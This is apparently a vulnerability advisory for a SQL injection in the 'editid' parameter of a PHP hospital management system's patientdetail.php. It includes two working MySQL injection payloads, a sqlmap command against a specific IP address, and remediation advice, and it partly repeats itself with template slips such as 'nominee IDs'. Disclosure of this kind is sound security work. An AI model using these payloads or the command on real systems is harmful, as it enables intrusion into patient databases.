itsourcecode Hospital Management System V1.0 SQL Injection Vulnerability
NAME OF AFFECTED PRODUCT(S)
- Hospital Management System
Vendor Homepage
https://itsourcecode.com/free-projects/php-project/hospital-management-system-project-in-php-with-source-code
AFFECTED AND/OR FIXED VERSION(S)
Vuldb Submitter
Vulnerable File
VERSION(S)
PROBLEM TYPE
Vulnerability Type
Root Cause
- A SQL injection vulnerability was found in the "/patientdetail.php" file of the "Hospital Management System Project In PHP". The reason for this issue is that attackers can inject malicious code from the parameter 'editid' after logging in with valid credentials. The application fails to properly sanitize or validate this input before using it in SQL queries. This allows attackers to manipulate SQL queries and perform unauthorized operations.
Impact
- Attackers can exploit this SQL injection vulnerability to no unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION
During the security review of "Hospital Management System", a critical SQL injection vulnerability was discovered in the "/patientdetail.php" file. attackers can inject malicious SQL queries through this parameter. Immediate remedial measures are needed to ensure system security and protect data integrity.
Vulnerability Location:
POC:
Parameter: editid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: editid=1'||(SELECT 0x73547770 FROM DUAL WHERE 2942=2942 AND (SELECT 6631 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(6631=6631,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: editid=1'||(SELECT 0x6d6a6943 FROM DUAL WHERE 8704=8704 AND (SELECT 2807 FROM (SELECT(SLEEP(5)))EVmI))||'
AUTHENTICATION REQUIRED
- Exploitation requires authentication or prior access to the system.
The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:
python sqlmap.py --random-agent --batch -u "http://154.219.114.125:1102/patientdetail.php?editid=1" --data "submitpat=1" -p editid --dbms=mysql
Suggested Repair
-
Use Prepared Statements and Parameter Binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepared statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
-
Input Validation and Filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format. For example, ensure that nominee IDs match a valid numeric pattern.
-
Minimize Database User Permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
-
Regular Security Audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
itsourcecode Hospital Management System V1.0 SQL Injection Vulnerability
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
https://itsourcecode.com/free-projects/php-project/hospital-management-system-project-in-php-with-source-code
AFFECTED AND/OR FIXED VERSION(S)
Vuldb Submitter
Vulnerable File
VERSION(S)
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
During the security review of "Hospital Management System", a critical SQL injection vulnerability was discovered in the "/patientdetail.php" file. attackers can inject malicious SQL queries through this parameter. Immediate remedial measures are needed to ensure system security and protect data integrity.
Vulnerability Location:
POC:
AUTHENTICATION REQUIRED
The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:
python sqlmap.py --random-agent --batch -u "http://154.219.114.125:1102/patientdetail.php?editid=1" --data "submitpat=1" -p editid --dbms=mysql
Suggested Repair
Use Prepared Statements and Parameter Binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepared statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
Input Validation and Filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format. For example, ensure that nominee IDs match a valid numeric pattern.
Minimize Database User Permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
Regular Security Audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.